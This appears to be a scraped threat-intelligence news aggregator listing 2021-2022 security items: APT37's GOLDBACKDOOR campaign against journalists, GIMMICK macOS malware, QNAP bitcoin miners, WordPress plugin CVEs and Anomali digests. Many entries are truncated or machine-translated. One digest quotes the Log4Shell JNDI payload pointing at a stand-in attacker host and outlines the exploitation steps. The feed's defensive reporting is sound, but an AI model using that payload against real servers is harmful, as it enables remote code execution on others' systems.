Inter-Process Communication - T1559 \| [MITRE ATT&CK] Windows Management Instrumentation - T1047 \| [MITRE ATT&CK] Scheduled Task - T1053 \| [MITRE ATT&CK] Server Software Component - T1505 \| [MITRE ATT&CK] Create or Modify System Process - T1543 \| [MITRE ATT&CK] Obfuscated Files or Information - T1027 \| [MITRE ATT&CK] Masquerading - T1036 \| [MITRE ATT&CK] Masquerading - T1036 \| [MITRE ATT&CK] Rootkit - T1014 \| [MITRE ATT&CK] Process Injection - T1055 \|	Ransomware Malware Tool Vulnerability Threat Guideline Cloud	APT 37 APT 10 APT 10
	2022-04-28 17:15:39	CVE-2022-29412 (lien direct)	Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Hermit ????? plugin	Cloud	APT 37
	2022-04-28 17:15:39	CVE-2022-29411 (lien direct)	SQL Injection (SQLi) vulnerability in Mufeng's Hermit ????? plugin	Vulnerability Cloud	APT 37
	2022-04-28 17:15:39	CVE-2022-29413 (lien direct)	Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) in Mufeng's Hermit ????? plugin	Guideline Cloud	APT 37
	2022-04-28 17:15:38	CVE-2022-29410 (lien direct)	Authenticated SQL Injection (SQLi) vulnerability in Mufeng's Hermit ????? plugin	Vulnerability Cloud	APT 37
	2022-04-26 11:38:17	Nation-state Hackers Target Journalists with Goldbackdoor Malware (lien direct)	A campaign by APT37 used a sophisticated malware to steal information about sources , which appears to be a successor to Bluelight.	Malware Cloud	APT 37
	2022-04-26 10:13:51	North Korea targets journalists with novel malware (lien direct)	State sponsored hackers operating out of North Korea have been targeting journalists with a novel malware strain, it has been revealed. The group, known as APT37, distribute the malware through a phishing attack originally discovered by NK news, a US news site specialising in covering news and providing research and analysis about North Korea, using […]	Malware Cloud	APT 37
	2022-04-26 08:25:03	North Korea-linked APT37 targets journalists with GOLDBACKDOOR (lien direct)	North Korea-linked APT37 group is targeting journalists that focus on DPRK with a new piece of malware. North Korea-linked APT37 group (aka Ricochet Chollima) has been spotted targeting journalists focusing on DPRK with a new piece of malware. The campaign was discovered by journalists at NK News, an American news site that focuses on North […]	Cloud	APT 37
	2022-04-26 02:53:07	North Korean Hackers Target Journalists with GOLDBACKDOOR Malware (lien direct)	A state-backed threat actor with ties to the Democratic People's Republic of Korea (DRPK) has been attributed to a spear-phishing campaign targeting journalists covering the country with the ultimate goal of deploying a backdoor on infected Windows systems. The intrusions, said to be the work of Ricochet Chollima, resulted in the deployment of a novel malware strain called GOLDBACKDOOR, an	Malware Threat Cloud	APT 37
	2022-03-22 16:12:11	Storm Cloud à l'horizon: Gimmick malware frappe à MacOS Storm Cloud on the Horizon: GIMMICK Malware Strikes at macOS (lien direct)	> Fin 2021, Volexity a découvert une intrusion dans un environnement surveillé dans le cadre de son service de surveillance de la sécurité du réseau.La volexité a détecté un système exécutant FRP, autrement connu sous le nom de proxy inverse rapide, et a ensuite détecté le balayage de port interne peu de temps après.Ce trafic a été déterminé comme non autorisé et le système, un MacBook Pro exécutant MacOS 11.6 (Big Sur), a été isolé pour une analyse médico-légale supplémentaire.Volexity a pu exécuter la surtension Collect pour acquérir la mémoire du système (RAM) et sélectionner les fichiers d'intérêt dans la machine pour l'analyse.Cela a conduit à la découverte d'une variante macOS d'un gadget d'appels de volexité d'implant de logiciels malveillants.La volexité a rencontré des versions Windows de la famille des logiciels malveillants à plusieurs reprises.Gimmick est utilisé dans les attaques ciblées de Storm Cloud, un acteur de menace d'espionnage chinois connue pour attaquer les organisations à travers l'Asie.Il s'agit d'une famille de logiciels malveillants multiplateforme riche en fonctionnalités qui utilise des services d'hébergement de cloud public (tels que Google [& # 8230;] >In late 2021, Volexity discovered an intrusion in an environment monitored as part of its Network Security Monitoring service. Volexity detected a system running frp, otherwise known as fast reverse proxy, and subsequently detected internal port scanning shortly afterward. This traffic was determined to be unauthorized and the system, a MacBook Pro running macOS 11.6 (Big Sur), was isolated for further forensic analysis. Volexity was able to run Surge Collect to acquire system memory (RAM) and select files of interest from the machine for analysis. This led to the discovery of a macOS variant of a malware implant Volexity calls GIMMICK. Volexity has encountered Windows versions of the malware family on several previous occasions. GIMMICK is used in targeted attacks by Storm Cloud, a Chinese espionage threat actor known to attack organizations across Asia. It is a feature-rich, multi-platform malware family that uses public cloud hosting services (such as Google […]	Malware Threat Cloud		★★★
	2022-03-16 00:00:00	Cybersécurité - la valeur et le besoin de formation pratique Cyber Security -The Value and Need for Practical Training (lien direct)	Whenever we are trying to master a new skill, we have all heard about the importance of practise. The associated attention, rehearsal and repetition leads to the acquisition of new knowledge or skills that can later be developed into more complex skillsets. This sentiment has been seen throughout history, where some of the world\'s most masterful people have shared a similar philosophy that is still true today: Bruce Lee - “Practice makes perfect. After a long time of practising, our work will become natural, skillfull, swift and steady” Abraham Lincoln - “Give me six hours to chop down a tree and I will spend the first four sharpening the axe.” Japanese Proverb – “Tomorrow\'s battle is won during todays practice” Vincent Van Gough – “As practise makes perfect, I cannot but make progress, each drawing one makes, each study one paints is a step forward” Marshawn Lynch - “When you get to practice against the best, it brings the best out of you.” Martha Graham – “Practice means to perform, over and over again in the face of all obstacles, some act of vision, of faith, of desire. Practice is a means of inviting the perfection desired” Unknown - “Don\'t practise until you get it right, practice until you can\'t get it wrong” Others might disagree slightly: Vince Lombardi – “Practise does not make perfect. Only perfect practise makes perfect” So, the message is clear, to master a skill, we need to practise but we need to practise against the best and in the best most realistic possible environment. In terms of cybersecurity, as the cyber threat environment grows more intense, cyber defence groups require more and more skilled professionals to help with the onslaught of cyberattacks. However, they are finding it increasingly difficult to recruit and hire trained security professionals as having a degree in cybersecurity is usually not enough to give an individual the skills required for mitigating sophisticated attacks. For Cyber Security professionals, the required practise involves realistic breach scenarios or cyberattacks. These breaches or cyberattacks are any attempt to gain unauthorized access to a computer, computing system or computer network with the intent to cause damage. The aim to disable, disrupt, destroy or control computer systems or to alter, block, delete, manipulate or steal the data held within these systems. Day-to-day work in cybersecurity offers few opportunities for such training on the job, resulting in the required practise being an extremely difficult thing to achieve. When you think about it, cyberattacks are seemingly in the news every day, which seems to contradict my previous statement. However, the results of a cyberattack can range from causing inconvenience to dire consequences. A cyberattack on critical infrastructure and/or healthcare sectors don\'t just affect data or computer systems, they can wreak havoc in the physical world. This was seen all too well in Ireland in the not so distant past. So, cyberattacks are prevalent but the consequences mean we aim to prevent as many breaches as possible and reduce the impact, contain and eradicate any attack that exploits a system. There lies the problem, cyber security professionals require realistic breach scenarios and cyberattacks to train and become sufficiently skilled but cyber professionals are consistently working hard to prevent such attacks in the real-world. So the question is, “how do we train cyber security professionals to deal with the challenging ever-changing cyber environment?”. The answer is a Cyber Range! A Cyber Range provides a secure, sandboxed virtual interactive training environment that can simulate real-world feel scenarios and environments, including complex IT environments and attacks on IT infrastructure, networks, software platforms and applications. As a result, a cyber range infrastructure provides the required training and practise elements of realistic breach scenarios and cyberattacks. A Cyber Range enables students to practice newly acquire	Tool Threat Studies Mobile Industrial Medical Cloud		★★
	2022-03-09 18:00:00	FedRamp Ready: La dernière désignation de Mandiant \\ prend en charge les clients du secteur public FedRAMP Ready: Mandiant\\'s Latest Designation Supports Public Sector Customers (lien direct)	Dans une autre étape importante dans sa mission pour que chaque organisation soit sécurisée des cyber-menaces, Mandiant a récemment annoncé qu'il avait obtenu la désignation FedRamp Ready pour sa première solution évaluée, Mandiant Advantage Défense automatisée .Atteignant la préparation à Le niveau d'impact élevé, la défense automatisée est désormais disponible dans le FedRamp Marketplace En tant qu'offre de services cloud (CSO), permettant aux agences fédérales de profiter de ses capacités de détection, de priorisation et de réponse accélérées. Qu'est-ce que FedRamp? Fedramp est un Programme du gouvernement qui favorise l'adoption de In yet another major milestone in its mission to make every organization secure from cyber threats, Mandiant recently announced that it achieved FedRAMP Ready designation for its first evaluated solution, Mandiant Advantage Automated Defense. Achieving readiness at the High impact level, Automated Defense is now available in the FedRAMP Marketplace as a Cloud Service Offering (CSO), allowing federal agencies to take advantage of its accelerated threat detection, prioritization and response capabilities. What is FedRAMP? FedRAMP is a government-wide program that promotes the adoption of	Threat Cloud		★★★
	2022-02-10 00:00:00	Cyber Security & # 8211;Une guerre de Troie où nous gagnons Cyber Security – A Trojan War where we win (lien direct)	Written by Dr. Anila Mjeda, Cyber Skills Lecturer In Ancient Greek literature, Troy is portrayed as a powerful kingdom of the Heroic Age. Troy\'s ability to withstand battles and attacks was due to the strength of its walls which, legend has it, were built by Greek gods, Poseidon and Apollo. This was all the more evident when Troy \'fell\' after it\'s supposed, impenetrable outer perimeter, got breached. This lesson from Greek Mythology echoes ever true in today\'s software systems. Our Cyber Security mechanisms must be approached in a manner called \'Defence-in-depth”, where a number of defence mechanisms are layered to offer better protection to the system. (Imagine the medieval castles\' layers of fine battlements, towers, and \'high\' and \'steep\' walls.) What is most vital in Cyber Security, is the inner most layer of a strong, defence-in-depth. This layer should start with secure coding which is a concept we call \'Shifting Left\'. Shifting Left Shifting left, in essence means incorporating security at the beginning of a project, such as data collecting, and incorporating security activities in each of the stages of the software development lifecycle. The shifting left metaphor stems from the fact that people whose native language is written from left to right, tend to perceive left (think of the outmost left on a page) as the place where one begins their work. As a developer, will your application need to handle credit card data? Will the users of your application be allowed to upload their own files to the system, and which third-party components will you be using in the system? These are but a fraction of the security considerations to be analysed from the beginning of any project. Today\'s software systems are inherently interconnected, and we cannot simply draw up the bridge and defend our systems medieval style. Software systems use libraries, APIs, microservices and in general a variety of components that translate to an end-product. There are complex dependencies, many of which to third-party software. Furthermore, modern approaches such as Continuous Integration / Continuous Deployment (CI/CD) pipelines, Infrastructure as Code (IaC), Security as Code (SaC), Platform as a Service (PaaS), and Infrastructure as a Service (IaaS) push more functionality into the software domain. This blurring of the boundaries means that security is not the job of only the security professionals and calls for the development team to play a crucial role in it. Software developers are talented and inventive creators and as cyber-attacks increase in numbers and severity, it is vital they collaborate closely with the security professionals and get the proper training to interweave security into their creations. While proper training of developers is the real answer to prevent vulnerabilities creeping up into our apps, if I were to start from one element, it would be the mentality of Zero-Trust. While I do not recommend it as a mentality for life, I do very much recommend it in all thing\'s cybersecurity. The Zero-Trust concept extends from infrastructure to software. In fact, one aspect of our software which if we do right, would solve most of our security woes is zero-trusting all inputs. Zero-Trust Your Inputs Language purists might forgive this conversion of zero-trust into a verb, on the grounds that placing no trust on all inputs (even when they come from your own system), would help us mitigate most of our security troubles. You may be asking, “Why don\'t we just do it then, and “solve” security once and for all?”. Part of the difficulty relies on identifying every single input. Did we identify all the cloud workflows that can trigger our serverless functions? Are there any unforeseen ways into our database (Hello injection vulnerabilities)? Can an attacker give instructions to the server and resultantly gain access they should not have (Server-Side Request Forgery (SSRF) vulnerabilities)? Can our web-based system be commandeered to attack our legitimate users (Cross Site Scripting (XSS) v	Vulnerability Cloud		★★
	2022-02-02 13:00:00	Annonçant la gestion de la surface d'attaque mandiante avantage Announcing Mandiant Advantage Attack Surface Management (lien direct)	Vous voulez sauter maintenant?Commencez avec Mandiant Advantage Attack Surface Management En créant votre Free Account aujourd'hui! Alors que les organisations continuent de numériser leur entreprise et que les employés sont autorisés à tirer parti de ces capacités, il n'est pas étonnant que les équipes de sécurité aient du mal à garder une trace des infrastructures, des applications, des services cloud et du saasSeul s'assurer que les politiques de sécurité sont respectées dans ces environnements.La surface d'attaque est considérablement et largement en expansion, et sans l'automatisation appropriée, il est peu probable que les équipes de sécurité aient la visibilité, le contrôle et Want to jump in now? Get started with Mandiant Advantage Attack Surface Management by creating your free account today! As organizations continue to digitize their business and employees are empowered to leverage these capabilities, it\'s no wonder security teams struggle to keep track of infrastructure, applications, cloud services and SaaS usage-let alone ensure security policies are adhered to across these environments. The attack surface is dramatically and vastly expanding, and without the proper automation, it is unlikely that security teams will have the visibility, control, and	Cloud		★★
	2022-01-19 00:00:00	Quelles tendances émergentes de cybersécurité devraient-elles être conscientes? Alors que le monde devient plus connecté numériquement, les entreprises doivent être conscientes des risques croissants de cybersécurité. What Emerging Cybersecurity Trends Should Enterprises Be Aware Of?As the world becomes more digitally connected, enterprises need to be aware of the growing cybersecurity risks.Read More (lien direct)	As the world becomes more digitally connected every year â and with the pandemic further accelerating digital transformation â all types of enterprises need to be aware of the growing cybersecurity risks that come with this shift.Â In Europe, for example, significant attacks on critical sectors more than doubled in 2020 compared to 2019, according to data from the European Union Agency for Cybersecurity, as reported by CNN. In 2021, the picture arguably became even bleaker around the world, with major ransomware attacks causing disruption to companies in industries ranging from energy to meat processing.In the first six months of 2021 alone, ransomware-related reported activity in the U.S. had a higher total value ($590 million) than all ransomware-related reported suspicious activity in the U.S. in 2020, according to the U.S. Department of Treasury\'s Financial Crimes Enforcement Network (FinCEN). The total number of suspicious events filed in the first six months of 2021 in the U.S. also exceeded all of what occurred in the country in 2020 by 30%, the agency reports.Â Yet itâs not just ransomware thatâs wreaking havoc. Enterprises also need to be prepared for cyber threats like denial of service (DoS) attacks, where a flood of network activity can interrupt servers, thereby causing business interruption. Cisco predicts that distributed denial of service (DDoS) attacks (a subset of DoS, which involves using multiple devices to send a flood of traffic, as opposed to just using one device with a DoS attack) globally will roughly âdouble from 7.9 million in 2018 to 15.4 million by 2023.âIn addition to preparing for these types of cyberattacks, enterprises will also increasingly need to be aware of and comply with privacy-related regulations. As governments around the world try to bolster their cybersecurity responses, they are passing or at least considering new rules and guidance around how companies need to handle sensitive data and privacy issues.Â Amidst this preparation, enterprises also need to recognize that cybersecurity plans arenât foolproof, especially as attacks evolve. That means assets could be at risk even with solid defenses in place. So, enterprises increasingly need to think about not just how to prevent cyber attacks but also consider the dollar-value cost of risk, given that events will inevitably occur.Â This process, known as cyber risk quantification â a form of financial quantification â helps enterprises think about and discuss cyber risk in definitive business terms. Knowing how much money is at stake and how different cyber events could affect revenue and profit can help businesses prioritize defenses and take mitigating action like securing cyber insurance.Â In this report, weâll take a closer look at these emerging cybersecurity trends that enterprises should be aware of. Understanding these areas can help organizations potentially improve their risk management, both from a cybersecurity and overall governance standpoint.Â ââEvolving Ransomware RisksWhile ransomware is not a new type of threat, the scale and intensity of ransomware continue to broaden. Enterprises large and small, across all types of industries, need to be prepared for these cyber attacks.For one, ransomware-as-a-service, âwhere ransomware variants are licensed to individuals and accomplices to execute attacks,â as Reuters explains, has been on the rise. Based on suspicious activity reports, FinCEN identified 68 ransomware variants in the first half of 2021.âThe resulting emergence of new attackers has led to increased uncertainty and volatility for companies in responding to attacks due to the lack of information on the growing number of ransomware threat actors,â adds Reuters.Part of the problem is also that ransomware attacks arenât just being launched on an ad-hoc basis by individuals. Instead, thereâs in	Ransomware Tool Threat Prediction Cloud		★★★
	2022-01-14 13:36:57	Campagne malware en cours exploitant des infrastructures de cloud public (lien direct)	Une campagne de malwares en cours a récemment été documentée par le groupe Talos de Cisco. Selon ses experts, elle exploite des infrastructures de cloud public, comme les services cloud AWS d'Amazon et Azure de Microsoft. À la vue de cette attaque, les cybercriminels optent désormais pour une infrastructure d'attaque entièrement dynamique, afin de contourner la distribution initiale et la détection d'accès. The post Campagne malware en cours exploitant des infrastructures de cloud public first appeared on UnderNews.	Malware Cloud
	2021-12-15 16:00:00	Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code. Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 \| [MITRE ATT&CK] Exploitation for Client Execution - T1203 \| [MITRE ATT&CK] Command and Scripting Interpreter - T1059 \| [MITRE ATT&CK] Remote Services - T1021 \| [MITRE ATT&CK] OS Credential Dumping - T1003 \| [MITRE ATT&CK] Resource Hijacking - T1496 \| [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1	Malware Tool Vulnerability Threat Cloud	APT 37 APT 29 APT 15 APT 15 APT 25
	2021-12-14 16:00:00	Azure Run Command pour les nuls Azure Run Command for Dummies (lien direct)	Dans le récent article de blog de Mandiant \\, nous avons détaillé Activité d'intrusion russe présumée qui cible les fournisseurs de services gérés (MSP) pour accéder à leurs clients CLUSIDE \\ '.D'autres sociétés, comme Microsoft, ont observé Activité ciblée de manière similaire contre les clients de plusieurs Cloud et fournisseurs de services gérés . Une technique notable de ces intrusions est l'utilisation de commandes Azure Run pour passer latéralement des hyperviseurs gérés aux clients MSP \\ 'sous-jacent sous-jacentmachines virtuelles. Ce dernier article de blog est une annexe supplémentaire pour mettre en surbrillance les commandes Azure Run et fournir In Mandiant\'s recent blog post, we detailed suspected Russian intrusion activity that targeted managed services providers (MSP) to gain access to their customers\' cloud environments. Other companies, such as Microsoft, have observed similarly targeted activity against customers of several cloud and managed service providers. One notable technique from these intrusions is the use of Azure Run Commands to move laterally from managed hypervisors to the MSP customers\' underlying virtual machines. This latest blog post comes as a supplementary annex to highlight Azure Run Commands and provide	Cloud		★★
	2021-12-07 22:33:02	Warning: Yet Another Bitcoin Mining Malware Targeting QNAP NAS Devices (lien direct)	Network-attached storage (NAS) appliance maker QNAP on Tuesday released a new advisory warning of a cryptocurrency mining malware targeting its devices, urging customers to take preventive steps with immediate effect. "A bitcoin miner has been reported to target QNAP NAS. Once a NAS is infected, CPU usage becomes unusually high where a process named '[oom_reaper]' could occupy around 50% of the	Malware Cloud	APT 37
	2021-12-07 16:04:00	Anomali Cyber Watch: Nginx Trojans, BlackByte Ransomware, Android Malware Campaigns, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Ransomware, Maldocs, E-Commerce, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New Malware Hides as Legit Nginx Process on E-Commerce Servers (published: December 2, 2021) Researchers at Sansec discovered NginRAT, a new malware variant that has been found on servers in the US, Germany, and France. Put in place to intercept credit card payments, this malware impersonates legitimate nginx processes which makes it very difficult to detect. NginRAT has shown up on systems that were previously infected with CronRAT, a trojan that schedules processes to run on invalid calendar days. This is used as a persistence technique to ensure that even if a malicious process is killed, the malware has a way to re-infect the system. Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity. MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 \| [MITRE ATT&CK] Shared Modules - T1129 Tags: NginRAT, CronRAT, Nginx, North America, EU How Phishing Kits Are Enabling A New Legion Of Pro Phishers (published: December 2, 2021) Phishing kits, such as XBALTI are seeing increased use against financial institutions. Mixing email with SMS messages, attackers are targeting companies such as Charles Schwab, J.P. Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are targeted and asked to verify account details. The attack is made to appear legitimate by redirecting to the real sites after information has been harvested. Analyst Comment: With financial transactions increasing around this time of year, it is likely financially themed malspam and phishing emails will be a commonly used tactic. Therefore, it is crucial that your employees are aware of their financial institution's policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel. Tags: Phishing, XBATLI Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors (pub	Ransomware Malware Tool Vulnerability Threat Cloud	APT 37	★★★★
	2021-12-07 15:28:27	Bitcoin Miner [oom_reaper] targets QNAP NAS devices (lien direct)	Taiwanese vendor QNAP warns customers of ongoing attacks targeting their NAS devices with cryptocurrency miners. Taiwanese vendor QNAP warns customers of threat actors targeting their NAS devices with cryptocurrency miners. Upon compromising the devices, the miner will create a new process named [oom_reaper] that allows threat actors to mine Bitcoin The above process could occupy […]	Threat Cloud	APT 37

Last update at: 2024-07-12 22:08:24
See our sources.

To see everything: Our RSS (filtrered)